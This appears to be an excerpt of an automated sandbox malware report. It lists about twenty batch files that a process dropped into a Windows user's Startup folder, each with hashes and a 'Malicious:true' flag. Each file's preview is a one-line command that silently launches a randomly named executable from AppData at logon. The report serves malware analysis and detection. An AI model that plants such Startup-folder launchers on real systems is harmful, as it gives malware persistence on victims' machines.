                                                                                                                                                                                                                                Entropy (8bit):4.811655711048255
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WEk75R3C5L:fE1sZ23WEiY5L
                                                                                                                                                                                                                                MD5:443B1B03844CF79C8D7D79EA67EE106E
                                                                                                                                                                                                                                SHA1:B2522D45E0AEFB71AA41CE9FC81C653CB3C59BF3
                                                                                                                                                                                                                                SHA-256:658997BCFFDFAB91AD0046AAFE5CE122831664B040488E507D3B1AA2F6F69D6E
                                                                                                                                                                                                                                SHA-512:62305015A5AC9CF10DF446C6FEB2E7CE204733CEF586C66E37DC5D4F61B0A9A5B829F2A057B41F4D1274A876FBE3C07AB84DFF001557067D1F0E1BD21E511DEB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\saftSBfOyQtbUhRB42BwTwJm.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABVMMLQpGhcp1W2ujjO04sLV.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.016001587426657
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5VyovQ70SELv:fE1sZ233Q70ZLv
                                                                                                                                                                                                                                MD5:BC9E85E9B05F45F5ADE68D9FE7EB3192
                                                                                                                                                                                                                                SHA1:5C6E6D9686B7F62DC2E1A4E79BF6A949DB1B0400
                                                                                                                                                                                                                                SHA-256:33B15249065A6AFBCD9851AEF2B0DC4534D774237212B33EAB22F9916DBC509C
                                                                                                                                                                                                                                SHA-512:840F0A4D0835D14C61C856FDF58662053ED19C57C90B47103FB1A520D40A3D3A3AB7C6476059FA511124E04820AA3B592014A5CAE3307492E4191BF6D618852E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BN2W9TNO6kL3gJzRRzdUbTZg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5Vt7Uv8TJBKLn:fE1sZ23H7UKS
                                                                                                                                                                                                                                MD5:36A322B162400A7C9C86FE923FF43796
                                                                                                                                                                                                                                SHA1:1E2B876CBF7781DBA634B0BC9DA5A38C93B1C9FD
                                                                                                                                                                                                                                SHA-256:BBA50501792239DB14F7045006D69A852ED6EA59C8DB819C5BF33FE159005A42
                                                                                                                                                                                                                                SHA-512:EB23E894CE9BC54FDDE3762FD7D844F0DC3167F3921111B4750D9C2D2A6541416BD91423E49A58B8B9FA82E921FF52142C5949EE04FEB6794A71053613B0E6FF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BosibbTKPcpK0gAFoIDe9sCf.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.784491899730469
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5cRMkjaiv:fE1sZ23cNxv
                                                                                                                                                                                                                                MD5:08B79590BD624F9ED07D3D2A7A54AD99
                                                                                                                                                                                                                                SHA1:6DE1BE3DFD9B0DAD975FCA9F57CDA97E585DC289
                                                                                                                                                                                                                                SHA-256:18507EB5A22B918D68024D664DA48324587A8C84567ACDE1D78EE3B59BAF0D47
                                                                                                                                                                                                                                SHA-512:9A215C32DDF8319418C52E2BB1D37DAAB8780CDCD77B8B8F9C5BA6FFA609E48561E8BDDFA43093976B2D610CCCB18A7E21B6DE5B55942699C90F3DB30EF0AA07
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\y6XaweA6d3ukZLoFeklnZ9Wr.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cg01RYFCgQ4yuUBvkQoejwXD.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.887065399713038
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52oNEiA1KTCVF:fE1sZ232o6xATCVF
                                                                                                                                                                                                                                MD5:3D024EBBAAFB2E1C18FA955E422564F4
                                                                                                                                                                                                                                SHA1:DFFE48FBD0E1D21CDF3FAB4563E1EDA7F4AC21FA
                                                                                                                                                                                                                                SHA-256:FF2261CC379F32830374773BAA8B836881F30D3CCD5E6C4B19E1EBA26DF27FA4
                                                                                                                                                                                                                                SHA-512:7D8D4E04C6296721DCDCD8A7B86A382CA04D788BA9BF32250DFA48679E71616887BE3B1E69D24EB786A2143870A2717FCDF60FB058A65C11645FF55024A42D12
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\S0j14drhBOZGdsEYt1IovCSw.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCp8sgzWACD6Vy523F9IlcQB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jkQJmmHF:fE1sZ23pmmHF
                                                                                                                                                                                                                                MD5:2B4801E7D6266824E739321F20359D48
                                                                                                                                                                                                                                SHA1:F0D05E24BE45FA319A8ED56112E02BCA2C645DCE
                                                                                                                                                                                                                                SHA-256:7C718F092A718D071128E31F838D28F6E2E814AF3D206C405616B323B90F6904
                                                                                                                                                                                                                                SHA-512:685D4359D7792F67883C859EFC1B19436A796F5429FD37D2A435398608BB4E65B54D026688CB605BF97A294DE7D809BEC44DDB8862C908CB87E7BBCE06648449
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FQM2AbwszjT1lQzUoXGDxSTy.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DJXmw8FbD4RPPXhLeAm8SoVJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.9379317041235735
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5AtjiyJNiNHF:fE1sZ23AtjiyeNHF
                                                                                                                                                                                                                                MD5:3017B9B2EE69659484D77D53044904B7
                                                                                                                                                                                                                                SHA1:CAEB057EC92A8156D82DDAB5F5F47DDA3C949368
                                                                                                                                                                                                                                SHA-256:2B2692ADC58E38992B9FE19AA5588E7B86CBE2171F3AE32A1A40ACA28202A581
                                                                                                                                                                                                                                SHA-512:A19AAA16C063ACC1D577C276955D1D0E95158328B57E743F8EA22562EDFA8C02EA5042079E36780D6CA5BE1A1A8E3F98464AFF3718B75DB41B628AB0E0E460B0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ehuKK8NkGWXoqtsyMQJdZvL3.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DsmX5IKpf85YqLtUG2emopLQ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.858686326958929
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5yWvuAxnPQogm:fE1sZ23yWvuAmY
                                                                                                                                                                                                                                MD5:D3F1833F48C33AD4EE5DB7A8C7CC2552
                                                                                                                                                                                                                                SHA1:181AE15D291EB3E7D09F1D47A22CB8B6892F4593
                                                                                                                                                                                                                                SHA-256:6FC55F0BF1DE032FC45C30CE639AB1314129D1FB482A0FB4E01A4BC071BA305C
                                                                                                                                                                                                                                SHA-512:3FBDCF4763EA917472F8ECBFD5D026FE359E13178A2A968B3FF048A7AA4AF8B6AAE0231AB345375F8C2AAA78A808235794F6B8A003EE5C465150A6152B727769
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\W7lXXTFWXeTByuMsbD5hqZaG.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5tTvG2AHFn:fE1sZ23hnm
                                                                                                                                                                                                                                MD5:0846E474C92A6F1BFF08370797439279
                                                                                                                                                                                                                                SHA1:E140A3230DD0F10AED5AA750E602A7C99C5CFB14
                                                                                                                                                                                                                                SHA-256:C313D97AB8F3266F967BC69F6C2AC2E0F7F1500BE1B712754F1E1FFB905D241C
                                                                                                                                                                                                                                SHA-512:E9BED64CF3F18254E234FF71654654648F02378A8109139409C74DA4AD16DB67826138DD2EA4DFD5399479E660AE702509BD0202066499AB6A2CC2165B642DA7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERBtXO5ho7nmZoFsGYVG8xKj.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.691877993562888
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5OOWla+18AEAEF:fE1sZ23OOWl3nEVF
                                                                                                                                                                                                                                MD5:20C3CA2680437DF514B3195114CA1ECB
                                                                                                                                                                                                                                SHA1:29D132977090F200839D2ED355CBD53B6B0A6FC0
                                                                                                                                                                                                                                SHA-256:B3A7E100056F2169CCF3C7A7093B027AA30105FF3A6D4FBB8301EE13DD1EF63F
                                                                                                                                                                                                                                SHA-512:51BA3DF4B8FC846E45F58864B9E8446B587BBD37E60C53E86DA3376BA04912797A9FCFF27B17CACDFDA1DDCAA8E33AE0C226D61A6931A4413E7EE02CAE9DEC4C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kkscE0U22us2Ek0MCP4ULYeK.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchWZdT95vOpzHp7On4mxxfQ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8980057982951175
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5dMhkLYi9HxzLVF:fE1sZ23ZYi9Rv
                                                                                                                                                                                                                                MD5:006B7FE35929594CAC2F5EC800AEAC7D
                                                                                                                                                                                                                                SHA1:05FEBC65C4304FB21FEFDCD791ED0454A0FBD435
                                                                                                                                                                                                                                SHA-256:1138D0D279A581F9E3DD367C1D492254996D56CB231D991813C8715882A6A043
                                                                                                                                                                                                                                SHA-512:07A600A2EAE854E252BDDCF88185B6A99F86EF133000EDB192576B9F14CB88A847F81250D80F43BEB1FE008C7BD9977E4E1F228C882895C6768104E29C1F19DD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8iDMf15n1CQluRX22T9R9HtN.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2GuBTHnmBkN3dSsucJeBkQG.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.836805529794771
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5NuMQDXTpydYcdLAdAHFn:fE1sZ23dQle9JAs
                                                                                                                                                                                                                                MD5:CA4896C7ACD0D21A28826ECCD749FC11
                                                                                                                                                                                                                                SHA1:9E3AFBCA4F989C3704EFE8FF885431BBE4F5436F
                                                                                                                                                                                                                                SHA-256:EE57B303306808C44A0784E015E52D57EE607A07199CA2028AD6AD2BBE185058
                                                                                                                                                                                                                                SHA-512:2DE8361984456D2A402DCAE2C04E1E014EAB77ECC34BA5C0BF3089B699DB1293B9306BCE72C9133A7D0ADEDF2055D3329D9866C28FE6BC0B1C6AD0DB1C119E6B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\hKiTsf257VLWDEryVqhdGiax.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.742744297973422
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5gHRG+x9TdAtQn:fE1sZ23gY+XH
                                                                                                                                                                                                                                MD5:99A808F526952ABF825D7317A069B726
                                                                                                                                                                                                                                SHA1:E2ED0F150842242031C5C1EF6A69443956D1FA64
                                                                                                                                                                                                                                SHA-256:C2D361E4187587B3027ADAB1E973DD20710F221A288C353D2F01C9301E4DEE55
                                                                                                                                                                                                                                SHA-512:ACC356685F3C46BD57374507C3C1AA095082AF7D7DC9FE5F83392E5D9EF08F233C9516BB9E2216C1CFC4C883851867E4D2A5619C623C858A04C7CAB78AE967F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\EuHyDssPP1nHlUuAX6xe7qHq.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpILK5HtW16MD0UJ7pzV1QPJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.907164268523369
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5qSXHHMmhSagjHF:fE1sZ23qKHMmhSl
                                                                                                                                                                                                                                MD5:FBCE133DBE896E56D966171E97875B11
                                                                                                                                                                                                                                SHA1:610D1B448EB6549D0B0BCB99B8DBFA8C1CBCAC60
                                                                                                                                                                                                                                SHA-256:AC47D803B4CCA6D85A9A0A471AE73723AD47BDE7481837A09726A1223E49E68D
                                                                                                                                                                                                                                SHA-512:BDEEF9FE5668F930B3E5AF2E8890D0BB75022EB3DC9BA89BD5B5D5DA700D3C90307A1E11907110DD51B8B398E4F3DE88741B37059A7C75F029583137838E71BB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\O85XP7ZryV2biCD7WlxJwLlh.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1y6rl2pC8mUDNK8qfoy3mwi.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.938912891964586
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5VUcGju/ciSkdan:fE1sZ23j0XD
                                                                                                                                                                                                                                MD5:E512FD029FBA19DBFC1EB74D7CFCD441
                                                                                                                                                                                                                                SHA1:C8AC8554AAAE0C925A52EAE4670DB55C4AEBC712
                                                                                                                                                                                                                                SHA-256:270F3EE6593EBF532275D6595E4A15AFF09AB6FCE58A706EC0F96D53516C4E1C
                                                                                                                                                                                                                                SHA-512:304C63F952CA807AD78D3EA2CA46D233CAA578CD202EFDC2A1CED91D9C3828B91F633CD1B67AED895CC4232887F4F28CF9136E5D4D32990803D019DCB56FF0F7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INQlUc1XgC4YubLIynK9wvrP.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8057662624023605
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5wuwsI7dn:fE1sZ23wujI7d
                                                                                                                                                                                                                                MD5:A48BBC2B83D88366691B35BA3ED0FF0C
                                                                                                                                                                                                                                SHA1:BC5B72F9928441FC96FFC082BB199325F340ECF9
                                                                                                                                                                                                                                SHA-256:927FA6FB02E4617B7997015D9CBC1A0BFD9D620C4BC6C7541A92016F5602E468
                                                                                                                                                                                                                                SHA-512:3956F943378CC17445AA3C0714B3AB39F4BE631EBAA3FE520A161331DABCF055AB067248A2CA340A12935EF480CFA3BD3DCB383D3140CF566CE563DA01A70327
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UK8ipx6lqPw4aE70mcGL0JtJ.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBjdJ2s3yN24CmoRslMpXshQ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.955688169790441
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5c081DkYN8PAZlIkdan:fE1sZ23cT1D3NG3D
                                                                                                                                                                                                                                MD5:DD739AB0A13916C6BEEDD683BAF64BBE
                                                                                                                                                                                                                                SHA1:91B010255E6E7E02837429C25E2E95B45BE0A4AD
                                                                                                                                                                                                                                SHA-256:093D9094F47737D9F00CD2EE54D177F9D402D585D284C2813C70A100BEB1D1E3
                                                                                                                                                                                                                                SHA-512:349B5087710396918384F8C830002D16F6BDB58E0DE71EC64FF74371118CFF1DD2730665DB9982B94C86CE0904AF209E8E7A066E65E2DC095E9F6B42ACC3E1E7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\9rAJjYr1uJZPfASZhYrXXHW2.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.934702450115979
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jcc9AeOcWOdEF:fE1sZ23LA9OaF
                                                                                                                                                                                                                                MD5:22E1E519FA71858A92772646F32590A3
                                                                                                                                                                                                                                SHA1:32E411DC18502623AEEC3A0DA3FEB7045ACA55A5
                                                                                                                                                                                                                                SHA-256:83C40748D62797D192EE21CE1AED9469764A06F68EE3537DC114787AC59DE91C
                                                                                                                                                                                                                                SHA-512:5DA885EB200042BA4A9FED18CD4E919EE4A09E902D7CF338572DA03F495C818C1A56E4EADA3AA34B6ABAC4BD93E297065EB5A352D3E690B7D96D14BD0383ACD8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JtkF0WemvMdybR3XRcsFyf1i.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7696760450737665
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J58D+mB1BHOm:fE1sZ238DZBym
                                                                                                                                                                                                                                MD5:99212DAFB405E16DA88F0FE1125E1A74
                                                                                                                                                                                                                                SHA1:23B48B17043762E270D472796001F89D2FA113D5
                                                                                                                                                                                                                                SHA-256:B2DE0980623E920FE50E36FD5FC9280836460B153BF07AE3601BEC57AFCCE33E
                                                                                                                                                                                                                                SHA-512:0C515FA692335201557CDF1B52CDCAA8202D74EBF8BF6E21492C1BB45A6EF6508917B6A3EE4311D5477B0FEC0CBF8EB52DF249637D1AFB2AEF77EFA05C86A02C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Yu3aePJPmCD2ksmvI16UpN6t.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KD5MxYvzde1avFdeWwU1rF85.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7368548493275275
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5wmPaLD8NH+EFNHFn:fE1sZ23wmPa+9v
                                                                                                                                                                                                                                MD5:BFF83D0ECF131C56B865468AC1E9DAAF
                                                                                                                                                                                                                                SHA1:B11D09D0BB392D46E85136D1D7454F5D64E090E2
                                                                                                                                                                                                                                SHA-256:161D6FA854EA8BFB81EC12147DA6E24EA748E4E3B1410C1558EBD7B7F870A1C6
                                                                                                                                                                                                                                SHA-512:D827B5D148BD6D9FCB8C4B1956F82F739ED481D5575AB15EA30B59235CC6D013C3062DDD0B26D85270FCAD22889AAE3A0303793F3190F8050A5F83AFF066395C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UCtmeOC2UHPIofYPbbfGVnal.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L66Dh4NdwdeMMxg3HjUpU2VV.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.930866761616118
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5uCnqmMoHIMBQDNl:fE1sZ23uCnqmMXMBwv
                                                                                                                                                                                                                                MD5:FB6914C04B34E4006629B786E018254C
                                                                                                                                                                                                                                SHA1:81626B2C9B878FE16573A72F4FE65933CA2948A6
                                                                                                                                                                                                                                SHA-256:B176DEB61F59ADA86C8F1D4E4AEF574CE4D516F05F46D489649F4E3DDA70CF8B
                                                                                                                                                                                                                                SHA-512:790BC6E3A2130D48F760CA47F2AA50B8CB96EFF75B76B266518B8B3EC3549C9B3788DD5B44B4AAE82AB28445114356FC0DD951589203DF4FDAE30CBF574119EF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\KgnOTzWY3o0raijub6ZAid5Z.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKepX7TNvoxrvNCU36z69Z8U.bat

                                                                                                                                                                                                                                Download File
